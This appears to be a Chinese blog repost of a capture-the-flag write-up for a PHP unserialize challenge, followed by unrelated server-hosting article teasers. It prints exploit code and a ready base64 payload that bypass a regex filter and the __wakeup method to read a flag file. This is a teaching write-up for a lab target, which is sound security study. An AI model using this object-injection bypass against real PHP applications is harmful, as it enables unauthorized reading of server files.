php安全攻防世界unserialize函数反序列化示例详解

admin3年前PHP教程49
目录
步骤总结

 

步骤

首先打开题目,发现给了一段源码:

分析源码,发现类里面有三个魔术方法:

__construct():构造函数,对类的变量进行初始化,创建时自动调用,用得到的参数覆盖$file

__destruct():销毁时调用,会显示文件的代码,这里要显示fl4g.php

__wakeup():在进行反序列化之前会调用,会把$file重置成index.php

正则表达式的含义:o或c开头,冒号,一个或多个数字,不区分大小写

ok,分析完毕:我们要将序列化后的字符串进行base64加密之后进行get传参到var变量即可
但是这里我们可以看出需要绕过__wakeup()函数以及正则匹配,才能够拿到flag

__wakeup()方法绕过方法:当成员属性的数目大于实际数目的时候即可绕过此方法

正则匹配我们可以使用+来进行绕过

代码:

<?phpclass Demo { private $file = "index.php";public function __construct($file) { $this->file = $file; }function __destruct() { echo @highlight_file($this->file, true); }function __wakeup() { if ($this->file != "index.php") { //the secret is in the fl4g.php$this->file = "index.php"; } } }$a = new Demo("fl4g.php");// 传入我们需要显示的文件$b = serialize($a);// 进行序列化echo $b;// O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}$b = str_replace("O:4", "O:+4", $b);// 绕过正则匹配$b = str_replace("1:{","2:{",$b);// 绕过__wakeup()方法echo base64_encode($b);// 进行base64编码并输出?>

payload:var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

成功拿到flag~

注意:这里有个坑,要是直接将序列化之后的字符串进行手动修改再去找在线网站进行加密则会发现编码之后和我们payload里的不太一样

这是因为file变量为私有变量,所以序列化之后的字符串开头和结尾各有一个空白字符,而我们在对序列化之后的字符串进行输出时,浏览器则不显示空字符,如图:

细心的朋友也会发现Demofile只有8个字符,而长度却显示10。

所以正确的序列化字符串应该是

O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}

而我们由于是使用php代码直接进行编码的,全自动化,自然不会漏掉空字符。

解释一下php序列化字符串的格式:

首先对象类型分为以下几种

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

格式:对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

 

总结

考察对php中魔术方法的熟悉程度,以及反序列化的应用

以上就是攻防世界Web php unserialize正则表达式反序列化详解的详细内容,更多关于php攻防世界unserialize正则表达式反序列化的资料请关注服务器之家其它相关文章!

原文链接:blog.csdn/weixin_45677145/article/details/120200365

免责声明:本文内容来自用户上传并发布,站点仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。请核实广告和内容真实性,谨慎使用。

相关文章

如何保护游戏服务器的安全?100G美国高防服务器租用地址是多少?

目前,很多方法都可以访问游戏服务器——根据各位在服务器上运行的服务,不仅要关注ROOT服务器访问,还要关注防火墙、网络服务器、应用程序、数据库服务器、电子邮件服务器、DNS以及FTP的安全性。如果各位...

租用美国站群服务器需要考虑哪些方面

租用美国站群服务器需要考虑哪些方面?1、制定适合自身企业的方案企业想要购买或是租用美国站群服务器,都是需要知道自身的企业需要什么样子的美国站群服务器,根据企业自身的发展情况,涉及的业务,网站的类型,根...

境外站群服务器有哪些好用的多ip服务器

境外站群服务器就是所谓的国外多ip服务器,是指美国、韩国、日本的多ip服务器。我们知道站群是SEO优化的重要手段,站群服务器的应用是不够的。仅限于网站应用,甚至很多游戏代理IP、外贸电商等都有一定的广...

专为跨境直播而设计的跨境直播网络专线

跨境直播网络专线是一种专为跨境直播而设计的网络服务。它的作用是提供高速、稳定、可靠的网络连接,以满足跨境直播的需求。跨境直播网络专线的使用可以帮助跨境直播企业快速、高效地传输直播信号,降低延迟、提高画...

PHP垃圾回收机制讲解

PHP的垃圾回收机制垃圾回收机制是一种动态存储分配的方案。它会自动释放程序不再需要的已分配的内存块。垃圾回收机制可以让程序员不必过分关心程序内存分配,从而将更多的精力投入到业务逻辑。在现在的流行各种语...

GPU服务器的运用有哪些呢美国GPU服务器多少钱一台

GPU服务器的运用有哪些呢?1、支持运行安卓模拟器,可支持蓝叠,逍遥,雷电,夜神等。用于手机游戏挂机和自动化脚本运行2、渲染业务场景需要GPU显卡实现图形加速及实时渲染,同时需要大量计算、内存或存储。...